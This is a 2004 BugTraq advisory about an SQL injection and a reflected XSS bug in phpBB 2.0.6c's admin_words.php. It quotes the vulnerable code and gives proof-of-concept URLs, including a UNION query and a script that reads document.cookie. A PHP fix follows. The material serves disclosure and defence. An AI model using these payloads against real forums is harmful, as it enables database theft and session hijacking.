BugTraq
[waraxe-2004-SA#009 - Non-critical Sql injection and XSS bug in PhpBB 2.0.6c] Mar 22 2004 04:58PM
Janek Vind (come2waraxe yahoo com)


{================================================================================}

{ [waraxe-2004-SA#009] }

{================================================================================}

{ }

{ [ Non-critical Sql injection and XSS bug in PhpBB 2.0.6c ] }

{ }

{================================================================================}

Author: Janek Vind "waraxe"

Date: 16. March 2004

Location: Estonia, Tartu

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PhpBB is widely used and very popular forum software, written in PHP.

Homepage: http://www.phpbb.com/

Vulnerabilities:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Original code from admin_words.php, $Id: admin_words.php,v 1.10.2.2 2002/05/12 15:57:45, starting from line 74:

-------------------------------

if( $mode == "edit" )
{
    if( $word_id )
    {
        // $word_id is interpolated into the query unquoted and unvalidated
        $sql = "SELECT *
            FROM " . WORDS_TABLE . "
            WHERE word_id = $word_id";
        if(!$result = $db->sql_query($sql))
        {
            message_die(GENERAL_ERROR, "Could not query words table", "Error", __LINE__, __FILE__, $sql);
        }

        $word_info = $db->sql_fetchrow($result);

        // the same raw value is echoed back into an HTML attribute without escaping
        $s_hidden_fields .= '<input type="hidden" name="id" value="' . $word_id . '" />';
    }
    else
    {
        message_die(GENERAL_MESSAGE, $lang['No_word_selected']);
    }
}

--------------------------------

As we can see, the parameter $word_id is inserted into the SQL query WITHOUT single quotes, so SQL injection is possible, for example with the UNION method:

http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=-1%20UNION%20ALL%20SELECT%20null/*

and we get error feedback:

------------------------------------------------

Error Could not query words table

DEBUG MODE

SQL Error : 1222 The used SELECT statements have a different number of columns

SELECT * FROM phpbb_words WHERE word_id = -1 UNION ALL SELECT null/*

Line : 83

File : D:\apache_wwwroot\phpbb206c\admin\admin_words.php

------------------------------------------------

By implementing so-called "blind" SQL injection methods, we can pull any information out of the SQL database. So why am I categorizing this bug as "non-critical"? Because we first need to log in as forum administrator to make a successful attack. So it's not such a "useful" security bug ;)

But let's think again - what if we make such a request:

http://localhost/phpbb206c/admin/admin_words.php?mode=edit&id=1/*"><script>alert(document.cookie);</script

So, in this way we can turn a not-so-useful SQL injection bug into a very useful XSS exploit.
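As an added example (not phpBB's own code), here is how the same step could be hardened against both bugs described above: the id is accepted only as a positive integer and passed as a bound parameter instead of being interpolated, and the value echoed into the hidden field is HTML-escaped. The function names are my own; the table name phpbb_words is taken from the error output above.

```php
<?php
// Added example, not phpBB code: hardened handling of the "id" parameter
// from admin_words.php, covering both the SQL injection and the XSS.

// Accept only a positive integer id; anything else is rejected outright.
function parse_word_id($raw): ?int
{
    // ctype_digit rejects "-1 UNION ...", "1/*\"><script>..." and "" alike;
    // the length guard keeps the cast well inside integer range.
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 10) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// Build the SELECT with the id as a bound value (PDO-style placeholder)
// rather than string interpolation. Returns [sql, params].
function build_word_query(int $word_id): array
{
    $sql = 'SELECT * FROM phpbb_words WHERE word_id = ?';
    return [$sql, [$word_id]];
}

// Emit the hidden field with the value HTML-escaped, so a reflected id
// cannot break out of the attribute even if validation were ever bypassed.
function hidden_id_field(int $word_id): string
{
    $safe = htmlspecialchars((string) $word_id, ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="id" value="' . $safe . '" />';
}

// Demonstration with a valid id and the two payloads quoted in the advisory
// (constructed here as the URL-decoded values the server would receive).
$samples = [
    '5',
    '-1 UNION ALL SELECT null/*',
    '1/*"><script>alert(document.cookie);</script',
];
foreach ($samples as $raw) {
    $id = parse_word_id($raw);
    if ($id === null) {
        echo "rejected: " . var_export($raw, true) . "\n";
        continue;
    }
    [$sql, $params] = build_word_query($id);
    echo "query: $sql  params: " . json_encode($params) . "\n";
    echo "field: " . hidden_id_field($id) . "\n";
}
```

Only the first sample reaches the query builder; both advisory payloads are refused before any SQL is built, and the hidden field is escaped regardless.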

Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum staff and to all IT security related people in Estonia! Tervitused!

Special greets to ulljobu!

Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe (at) yahoo (dot) com [email concealed]

Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------
